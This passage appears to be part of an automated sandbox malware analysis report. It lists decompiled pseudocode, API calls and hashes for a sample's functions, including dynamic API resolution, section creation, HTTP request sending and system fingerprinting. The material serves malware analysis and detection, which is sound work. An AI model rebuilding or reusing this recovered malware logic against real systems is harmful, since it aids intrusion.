					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00401BA9(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E0040110B(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00401210
0x00401214
0x004012d5
0x0040121a
0x00401232
0x00401241
0x00401248
0x0040124a
0x0040124f
0x004012cd
0x004012ce
0x00401251
0x0040125e
0x00401260
0x00401265
0x00000000
0x00401267
0x00401274
0x00401276
0x0040127b
0x00000000
0x0040127d
0x0040128a
0x0040128c
0x00401291
0x00000000
0x00401293
0x004012a0
0x004012a2
0x004012a7
0x00000000
0x004012a9
0x004012af
0x004012b5
0x004012ba
0x004012bf
0x004012c4
0x00000000
0x004012c6
0x004012c9
0x004012c9
0x004012c4
0x004012a7
0x00401291
0x0040127b
0x00401265
0x0040124f
0x004012e3

APIs

Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
GetProcAddress.KERNEL32(00000000,?), ref: 00401248
GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
GetProcAddress.KERNEL32(00000000,?), ref: 00401274
GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
GetProcAddress.KERNEL32(00000000,?), ref: 004012A0

Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 00401168
Part of subcall function 0040110B: memset.NTDLL ref: 0040118A

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68

Uniqueness

Uniqueness Score: -1.00%

Function 047E51D8 Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E51D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E047E2058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E047E7B83(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x047e51d8
0x047e51e5
0x047e51e7
0x047e524a
0x00000000
0x047e524a
0x047e51ff
0x047e5206
0x047e5212
0x047e5217
0x047e522d
0x047e523d
0x00000000
0x047e522f
0x047e522f
0x047e5236
0x047e5243
0x047e5243
0x047e5243
0x047e5236
0x047e522d
0x047e5248
0x00000000
0x00000000
0x047e524e

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,047E21E7,?,?,746981D0,00000000), ref: 047E5212
ResetEvent.KERNEL32(?), ref: 047E5217
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 047E5224
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,047E3F34,00000000,?,?), ref: 047E522F
GetLastError.KERNEL32(?,?,00000102,047E21E7,?,?,746981D0,00000000), ref: 047E524A

Part of subcall function 047E2058: lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?,?,746981D0), ref: 047E2064
Part of subcall function 047E2058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?), ref: 047E20C2
Part of subcall function 047E2058: lstrcpy.KERNEL32(00000000,00000000), ref: 047E20D2

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,047E3F34,00000000,?), ref: 047E523D

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 3739416942-0
Opcode ID: 286b9bed655437f3c4ceca7c1df83fb167c66ef5ccdb7d41e5e2a345d956ed5f
Instruction ID: 7468267b4ba301ac5d8ae5c36ef7c18b4ea40c07b388d46c1ec2b7c5e4d07d3e
Opcode Fuzzy Hash: 286b9bed655437f3c4ceca7c1df83fb167c66ef5ccdb7d41e5e2a345d956ed5f
Instruction Fuzzy Hash: 41014BB1100205BAEB306AB7ED48F6B77A9EF4C368F104B29E691952E1D721F814DA20

Uniqueness

Uniqueness Score: -1.00%

Function 047E5364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E047E5364(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x47ea3cc; // 0x5429600
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x47ea3cc; // 0x5429600
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x47ea030) {
					HeapFree( *0x47ea2d8, 0, _t8);
				}
				_t9 = E047E12C6(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x47ea3cc; // 0x5429600
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x047e5364
0x047e5364
0x047e536d
0x047e537d
0x047e537d
0x047e5382
0x047e5387
0x00000000
0x00000000
0x047e5377
0x047e5377
0x047e5389
0x047e538d
0x047e539f
0x047e539f
0x047e53aa
0x047e53af
0x047e53b2
0x047e53b7
0x047e53bb
0x047e53c1

APIs

RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E536D
Sleep.KERNEL32(0000000A), ref: 047E5377
HeapFree.KERNEL32(00000000,00000000), ref: 047E539F
RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E53BB

Strings

Uet, xrefs: 047E539F

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uet
API String ID: 58946197-2766386878
Opcode ID: e3637365f891dd1c0dc6119b7d6a22576ead414d96ae5b1a09a2173a040f0304
Instruction ID: 4e4340bdf3c7fb7eab87340dd15e58db0dad98b1d32837e209101070bf1f1502
Opcode Fuzzy Hash: e3637365f891dd1c0dc6119b7d6a22576ead414d96ae5b1a09a2173a040f0304
Instruction Fuzzy Hash: 98F0D0B1600142EBE7209FA7DD48BA67BA4DB4D348B44CB14B501DA351D674EC50DB25

Uniqueness

Uniqueness Score: -1.00%

Function 047E2523 Relevance: 7.7, APIs: 5, Instructions: 161
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E047E2523(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				CHAR* _t37;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t52;
				signed char _t57;
				intOrPtr _t59;
				signed int _t60;
				void* _t64;
				CHAR* _t68;
				CHAR* _t69;
				char* _t70;
				void* _t71;

				_t62 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E047E4520();
				if(_t21 != 0) {
					_t60 =  *0x47ea2fc; // 0x2000000a
					_t56 = (_t60 & 0xf0000000) + _t21;
					 *0x47ea2fc = (_t60 & 0xf0000000) + _t21;
				}
				_t22 =  *0x47ea178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E047E3037( &_v8,  &_v20); // executed
					_t55 = _t25;
					_t26 =  *0x47ea348; // 0xc3d5a8
					if( *0x47ea2fc > 5) {
						_t8 = _t26 + 0x47eb51d; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x47eb9db; // 0x44283a44
						_t27 = _t7;
					}
					E047E4332(_t27, _t27);
					_t31 = E047E415A(_t62,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t64 = 5;
					if(_t55 != _t64) {
						_t32 = E047E27A0();
						 *0x47ea310 =  *0x47ea310 ^ 0x81bbe65d;
						 *0x47ea36c = _t32;
						_t33 = E047E33DC(0x60);
						 *0x47ea3cc = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t33, 0, 0x60);
							_t50 =  *0x47ea3cc; // 0x5429600
							_t71 = _t71 + 0xc;
							__imp__(_t50 + 0x40);
							_t52 =  *0x47ea3cc; // 0x5429600
							 *_t52 = 0x47eb142;
						}
						_t55 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t37 = RtlAllocateHeap( *0x47ea2d8, 0, 0x43);
							 *0x47ea368 = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t57 =  *0x47ea2fc; // 0x2000000a
								_t62 = _t57 & 0x000000ff;
								_t59 =  *0x47ea348; // 0xc3d5a8
								_t13 = _t59 + 0x47eb74a; // 0x697a6f4d
								_t56 = _t13;
								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x47e927b);
							}
							_t55 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E047E3BD3( ~_v8 &  *0x47ea310, 0x47ea00c); // executed
								_t43 = E047E1D8A(0, _t56, _t62, _t64, 0x47ea00c); // executed
								_t55 = _t43;
								__eflags = _t55;
								if(_t55 != 0) {
									goto L30;
								}
								_t44 = E047E6EA3(_t62); // executed
								__eflags = _t44;
								if(_t44 != 0) {
									__eflags = _v8;
									_t68 = _v12;
									if(_v8 != 0) {
										L29:
										_t45 = E047E6815(_t62, _t68, _v8); // executed
										_t55 = _t45;
										goto L30;
									}
									__eflags = _t68;
									if(__eflags == 0) {
										goto L30;
									}
									_t55 = E047E5C31(__eflags,  &(_t68[4]));
									__eflags = _t55;
									if(_t55 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t55 = 8;
							}
						}
					} else {
						_t69 = _v12;
						if(_t69 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x47ea17c();
							}
							goto L34;
						}
						_t70 =  &(_t69[4]);
						do {
						} while (E047E23C4(_t64, _t70, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t55 = _t22;
					L34:
					return _t55;
				}
			}

0x047e2523
0x047e252d
0x047e2530
0x047e2533
0x047e2536
0x047e253d
0x047e253f
0x047e254b
0x047e254d
0x047e254d
0x047e2556
0x047e255c
0x047e2561
0x047e257b
0x047e2587
0x047e2589
0x047e258e
0x047e2598
0x047e2598
0x047e2590
0x047e2590
0x047e2590
0x047e2590
0x047e259f
0x047e25ac
0x047e25b3
0x047e25b8
0x047e25b8
0x047e25c1
0x047e25c4
0x047e25ea
0x047e25ef
0x047e25fb
0x047e2600
0x047e2605
0x047e260a
0x047e260c
0x047e2638
0x047e263a
0x047e260e
0x047e2612
0x047e2617
0x047e261c
0x047e2623
0x047e2629
0x047e262e
0x047e2634
0x047e263b
0x047e263d
0x047e263f
0x047e264e
0x047e2654
0x047e2659
0x047e265b
0x047e268b
0x047e268d
0x047e265d
0x047e265d
0x047e2663
0x047e2670
0x047e2676
0x047e2676
0x047e267e
0x047e2687
0x047e268e
0x047e2690
0x047e2692
0x047e2699
0x047e26a6
0x047e26ab
0x047e26b0
0x047e26b2
0x047e26b4
0x00000000
0x00000000
0x047e26b6
0x047e26bb
0x047e26bd
0x047e26c4
0x047e26c8
0x047e26cb
0x047e26e0
0x047e26e4
0x047e26e9
0x00000000
0x047e26e9
0x047e26cd
0x047e26cf
0x00000000
0x00000000
0x047e26da
0x047e26dc
0x047e26de
0x00000000
0x00000000
0x00000000
0x047e26de
0x047e26c1
0x047e26c1
0x047e2692
0x047e25c6
0x047e25c6
0x047e25cb
0x047e26eb
0x047e26f0
0x047e26f8
0x047e26f8
0x00000000
0x047e26f0
0x047e25d1
0x047e25d4
0x047e25de
0x047e25e5
0x00000000
0x047e2700
0x047e2700
0x047e2703
0x047e2707
0x047e2707

APIs

Part of subcall function 047E4520: GetModuleHandleA.KERNEL32(4C44544E,00000000,047E253B,00000001), ref: 047E452F

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 047E25B8

Part of subcall function 047E27A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 047E27C4
Part of subcall function 047E27A0: wsprintfA.USER32 ref: 047E2828

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

memset.NTDLL ref: 047E2612
RtlInitializeCriticalSection.NTDLL(054295C0), ref: 047E2623

Part of subcall function 047E5C31: memset.NTDLL ref: 047E5C4B
Part of subcall function 047E5C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 047E5C91
Part of subcall function 047E5C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 047E5C9C

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 047E264E
wsprintfA.USER32 ref: 047E267E

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
String ID:
API String ID: 1825273115-0
Opcode ID: 4ef908d78b0aa662c5e7501ae0ba8e74adaffa9e0d720d94cb66f9c9c516fa19
Instruction ID: 8da4638c5c6eae3ff9ef9462ad0d4796c68556b1d96742e7d15f1f484cd27c1b
Opcode Fuzzy Hash: 4ef908d78b0aa662c5e7501ae0ba8e74adaffa9e0d720d94cb66f9c9c516fa19
Instruction Fuzzy Hash: 5A51B771A01215EBDB11DBA7DD58BBE37ACEB0C704F148B96E502EB342E679B9408B50

Uniqueness

Uniqueness Score: -1.00%

Function 047E7040 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E047E7040(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E047E33DC(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E047E61DA(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E047E33DC((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x47ea318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x047e7047
0x047e704e
0x047e7053
0x047e7056
0x047e705d
0x047e7060
0x047e7063
0x047e7068
0x047e706d
0x047e71c1
0x047e71c3
0x047e71c5
0x047e71ca
0x047e71ca
0x047e7073
0x047e7076
0x047e7079
0x047e707b
0x047e707b
0x047e707f
0x00000000
0x00000000
0x047e7083
0x047e70af
0x047e70b4
0x047e70b6
0x047e70b6
0x047e70b9
0x047e70bc
0x047e70bc
0x047e70be
0x00000000
0x047e7089
0x047e708b
0x047e70aa
0x047e70aa
0x047e70c1
0x047e70c1
0x047e70c2
0x047e70c2
0x047e70c5
0x00000000
0x00000000
0x00000000
0x047e70c5
0x047e708f
0x047e70d6
0x047e70da
0x047e71b4
0x047e71b6
0x047e71b6
0x047e71b7
0x047e71ba
0x00000000
0x047e71ba
0x047e70e3
0x047e70f4
0x047e70f8
0x047e71b0
0x00000000
0x047e71b0
0x047e70fe
0x047e7101
0x047e7105
0x047e7109
0x047e710e
0x047e71a6
0x047e71a6
0x00000000
0x047e71ac
0x047e7119
0x047e7122
0x047e7136
0x047e713d
0x047e7152
0x047e7158
0x047e7160
0x00000000
0x00000000
0x00000000
0x00000000
0x047e7162
0x047e7162
0x047e7162
0x047e7169
0x047e7171
0x00000000
0x00000000
0x047e7173
0x047e717c
0x00000000
0x00000000
0x00000000
0x047e717e
0x047e7180
0x047e7183
0x047e7183
0x047e7186
0x047e718a
0x047e718d
0x047e7193
0x047e7196
0x047e719d
0x00000000
0x047e7119
0x047e7094
0x047e709c
0x047e70a2
0x047e70a4
0x047e70a4
0x047e70a7
0x047e70a9
0x00000000
0x047e70a9
0x047e7083
0x047e70c9
0x047e70ce
0x047e70d0
0x047e70d0
0x047e70d3
0x047e70d3
0x00000000

APIs

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

lstrcpy.KERNEL32(43175AC4,00000020), ref: 047E713D
lstrcat.KERNEL32(43175AC4,00000020), ref: 047E7152
lstrcmp.KERNEL32(00000000,43175AC4), ref: 047E7169
lstrlen.KERNEL32(43175AC4), ref: 047E718D

Strings

, xrefs: 047E70D6

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 9d6f7317d6e7b1c2013a11e0f6c5231f6f0c4273bb81ad3ca4d6d81618d98d01
Instruction ID: e0717ba2bee134c914f9437c230776c3826013af792a1fafc5eafe718f15cc11
Opcode Fuzzy Hash: 9d6f7317d6e7b1c2013a11e0f6c5231f6f0c4273bb81ad3ca4d6d81618d98d01
Instruction Fuzzy Hash: C6519271A00218EBDF19CF9AC4846BDBBB6EF89354F14865AE9159F301C771AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00401DE1 Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x404160 = _t1;
				if(_t1 != 0) {
					 *0x404170 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E004019F1(); // executed
					_t6 = _t4;
					HeapDestroy( *0x404160);
				}
				ExitProcess(_t6);
			}

0x00401de2
0x00401deb
0x00401df1
0x00401df8
0x00401e01
0x00401e06
0x00401e0c
0x00401e17
0x00401e19
0x00401e19
0x00401e20

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
GetCommandLineW.KERNEL32 ref: 00401E06

Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL ref: 00401A26
Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD

HeapDestroy.KERNEL32 ref: 00401E19
ExitProcess.KERNEL32 ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
String ID:
API String ID: 1863574965-0
Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC

Uniqueness

Uniqueness Score: -1.00%

Function 047E5251 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E5251(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E047E6ADC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x47ea348; // 0xc3d5a8
				_t4 = _t24 + 0x47ebc70; // 0x5429218
				_t5 = _t24 + 0x47ebb60; // 0x4f0053
				_t26 = E047E33F1( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x47ea348; // 0xc3d5a8
						_t11 = _t32 + 0x47ebcc8; // 0x5429270
						_t48 = _t11;
						_t12 = _t32 + 0x47ebb60; // 0x4f0053
						_t52 = E047E5DE4(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x47ea348; // 0xc3d5a8
							_t13 = _t35 + 0x47ebcf0; // 0x30314549
							_t37 = E047E5157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x47ea2fc - 6;
								if( *0x47ea2fc <= 6) {
									_t42 =  *0x47ea348; // 0xc3d5a8
									_t15 = _t42 + 0x47ebcd2; // 0x52384549
									E047E5157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x47ea348; // 0xc3d5a8
							_t17 = _t38 + 0x47ebbb8; // 0x5429160
							_t18 = _t38 + 0x47ebc1c; // 0x680043
							_t45 = E047E5B0E(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x47ea2d8, 0, _t52);
						}
					}
					HeapFree( *0x47ea2d8, 0, _v16);
				}
